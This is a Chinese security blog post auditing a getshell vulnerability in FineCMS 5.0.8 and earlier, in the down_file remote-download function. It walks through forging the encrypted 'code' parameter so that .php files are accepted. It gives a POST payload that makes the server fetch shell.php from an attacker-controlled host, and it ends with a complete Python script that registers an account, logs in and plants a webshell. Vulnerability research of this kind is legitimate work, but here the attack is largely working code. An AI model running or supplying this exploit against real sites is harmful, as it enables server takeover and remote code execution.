通杀FineCMS5.0.8及版本以下getshell的漏洞(每天一洞)
前言
这几天都挺忙的,刚开学也在做比赛的培训,每天一洞这个事情一定得坚持下去,跟着上次的finecms,在漏洞时代又找了一个漏洞来审计。但是他改了函数里面的传参,我也弄了一阵子才搞明白这个传参原来需要加密过的参数,还有就是这个远程下载再上传,有个小问题,那篇文章没有说明,等下再系统说下。
漏洞详情
代码位置和代码
- 位置
\finecms\dayrui\controllers\member\Api.php - 代码
public function down_file() {
$p = array(); $url = explode('&', $this->input->post('url')); //经过& 分割
foreach ($url as $t) { $item = explode('=', $t); $p[$item[0]] = $item[1]; } //经过 = 分割 !$this->uid && exit(dr_json(0, fc_lang('游客不允许上传附件'))); //对$p['code'] 进行解码 list($size, $ext) = explode('|', dr_authcode($p['code'], 'DECODE')); //得到尺寸和后缀 $path = SYS_UPLOAD_PATH.'/'.date('Ym', SYS_TIME).'/'; !is_dir($path) && dr_mkdirs($path);
$furl = $this->input->post('file'); $file = dr_catcher_data($furl); //dr_catcher_data 是读取远程文件 !$file && exit(dr_json(0, '获取远程文件失败'));
$fileext = strtolower(trim(substr(strrchr($furl, '.'), 1, 10))); //扩展名 !@in_array($fileext, @explode(',', $ext)) && exit(dr_json(0, '远程文件扩展名('.$fileext.')不允许'));
$filename = substr(md5(time()), 0, 7).rand(100, 999); if (@file_put_contents($path.$filename.'.'.$fileext, $file)) { $info = array( 'file_ext' => '.'.$fileext, 'full_path' => $path.$filename.'.'.$fileext, 'file_size' => filesize($path.$filename.'.'.$fileext)/1024, 'client_name' => '', );执行过程
Payload代码
http://finecmstest.com/index.php?s=member&c=api&m=down_file
POST:url=code=d628NBt44h5NLBYyi2QIPBI37HOHqQJz/JvPubFBaG5c&file=http://192.168.232.128/shell.php
执行结果
分析过程
老样子,挑重要的代码来读,跟着我的思路能读懂这段函数的流程。
$p = array();创建一个数组,为下面的遍历赋值所用。$url = explode('&', $this->input->post('url'));接收url参数的值,explode这个函数就不用多说了,用于把字符串转换成数组,以&分割为一个数组。foreach ($url as $t) {$item = explode('=', $t);$p[$item[0]] = $item[1];}这一段遍历就是把上面的数组赋值给$p变量。!$this->uid && exit(dr_json(0,fc_lang('抱歉!游客不允许上传附件')));判断是否登录
$p = array(); $url = explode('&', $this->input->post('url')); foreach ($url as $t) { $item = explode('=', $t); $p[$item[0]] = $item[1]; } !$this->uid && exit(dr_json(0, fc_lang('抱歉!游客不允许上传附件')));- 这段用了
list函数,就是把explode的三个值赋值给$size, $ext, $path, 当中用了dr_authcode这个函数,跟进了一下这个函数在\finecms\dayrui\helpers\function_helper.php里面,是一段discuz加密/解密的函数,这个函数主要看的是$key = md5($key ? $key : SYS_KEY);和$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string . $keyb), 0, 16) . $string;$string_length = strlen($string);这两句,SYS_KEY这个值在上一篇文章看过了,值是固定的,所以不用理会。下来一句就是如果$operation == ‘DECODE’那就解密,如果不等于DECODE那就加密。
list($size, $ext, $path) = explode('|', dr_authcode($p['code'], 'DECODE'));dr_authcode函数代码:
function dr_authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
if (!$string) { return ''; }
$ckey_length = 4;
$key = md5($key ? $key : SYS_KEY); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya . md5($keya . $keyc); $key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string; $string_length = strlen($string);
$result = ''; $box = range(0, 255);
$rndkey = array(); for ($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); }
for ($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; }
for ($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result.= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); }
if ($operation == 'DECODE') { if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc . str_replace('=', '', base64_encode($result)); }}- 这段代码就是生成文件的路径,
dr_mkdirs在上一篇的已经解释过了,生成的目录是日期。
$path = SYS_UPLOAD_PATH.'/'.date('Ym', SYS_TIME).'/'; !is_dir($path) && dr_mkdirs($path);- 继续下面这段,
$furl是获取file参数的值,dr_catcher_data这个函数可以跟进看下,只要是获取远程文件的内容的。如果远程文件没有内容就获取失败。
$furl = $this->input->post('file'); $file = dr_catcher_data($furl); !$file && exit(dr_json(0, '获取远程文件失败'));- 这段是判断扩展名的,在这里也说下这几个函数的作用吧,
strrchr是把$ful的内容中.后面的值和.一起提取出来;substr返回字符串中1-10的字符串,也就是说刚才提取出来的扩展名.php从1开始只要php;trim去掉两边的空格;strtolower把字符串全部变成小写。 再下来这句就是判断上传的文件的扩展名$fileext是否在$ext里面。
$fileext = strtolower(trim(substr(strrchr($furl, '.'), 1, 10))); //扩展名!@in_array($fileext, @explode(',', $ext)) && exit(dr_json(0, '远程文件扩展名('.$fileext.')不允许'));- 这段的内容就是写文件了,文件名是随机的。
$filename = substr(md5(time()), 0, 7).rand(100, 999); if (@file_put_contents($path.$filename.'.'.$fileext, $file)) { $info = array( 'file_ext' => '.'.$fileext, 'full_path' => $path.$filename.'.'.$fileext, 'file_size' => filesize($path.$filename.'.'.$fileext)/1024, 'client_name' => '', );构造扩展名参数
这块内容可以另外当作一节来讲,重新来理顺刚才讲的代码流程就能知道如何来构造扩展名的参数。
我们逆过来看:
1.判断$ext里面的扩展名
2.$ext变量获取在$p['code']数组里面
3.$p['code']要经过dr_authcode函数的解密
4.$p['code']又是从$url 数组里面提取出来
所以这里我们可以看到$ext是可控的,而我们要传入加密的$p['code'],我们用dr_authcode加密一遍就行了,在程序里面加入这句代码echo dr_authcode("|php","a");就可以得出加密的值,这个a可以写任意值,只要不写DECODE就行了。|php加密这个就是为了list这个函数的作用。
$url = explode('&', $this->input->post('url')); foreach ($url as $t) { $item = explode('=', $t); $p[$item[0]] = $item[1]; } !$this->uid && exit(dr_json(0, fc_lang('抱歉!游客不允许上传附件'))); //echo dr_authcode("|php","a"); list($size, $ext, $path) = explode('|', dr_authcode($p['code'], 'DECODE')); $fileext = strtolower(trim(substr(strrchr($furl, '.'), 1, 10))); //扩展名 !@in_array($fileext, @explode(',', $ext)) && exit(dr_json(0, '远程文件扩展名('.$fileext.')不允许'));
构造出url的参数为:url=code=ad3eXTkH4Wt084pW46p7DBSt1KX0FwthAs4o9oBH8WVi
构造file参数
构造代码:file=http://192.168.232.128/shell.php
事情没有想得那么简单,这个函数的作用是下载然后再上传,它只是获取显示出来的html的内容然后把这些内容下载下来。所以我们直接在远程服务器写php文件是不可行的。
远程的服务器有一个要求,就是不解析PHP文件,不解析,不就把内容显示出来了么。
最简单的方法就是用装一个apache写一个php文件就行了。
用Python写Getshell脚本
写这个脚本也是要注册登录获取登录后的状态再getshell
finecms_down_file.py
'''author:F0rmat'''import sysimport randomimport requestsimport jsonimport time
def exploit(target,rtarget): username = random.randint(0, 999999) seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" email = [] for i in range(8): email.append(random.choice(seed)) email = ''.join(email)
# step 1 register register_url = target + "/index.php?s=member&c=register&m=index" register_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[password2]": "123456", "data[email]": email + "@" + email + ".com"} # step 2 login login_url = target + "/index.php?s=member&c=login&m=index" login_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[auto]": "1"}
url = target+"/index.php?s=member&c=api&m=down_file" payload = {"url":"code=ad3eXTkH4Wt084pW46p7DBSt1KX0FwthAs4o9oBH8WVi","file":rtarget} # step 3 start hacking" s = requests.session() s.post(register_url, data=register_payload) s.post(login_url, data=login_payload) res=s.post(url,data=payload).content hjson = json.loads(res) if "php" in res: print "shell:"+target+"/uploadfile/"+time.strftime("%Y%m")+"/"+hjson['name'] else: print "failure"
if len(sys.argv)<5: print 'python down_file_getshell.py -h http://127.0.0.1 -r http://10.0.0.1/shell.php'else: target = sys.argv[2] rtarget = sys.argv[4] exploit(target,rtarget)结束
02:13:53
为了赶这篇文章现在已经深夜了,为了实现自己的承诺,坚持下去!
参考
http://0day5.com/archives/4405/
https://github.com/F0r3at/Python-Tools/blob/master/finecms/down_file_getshell.py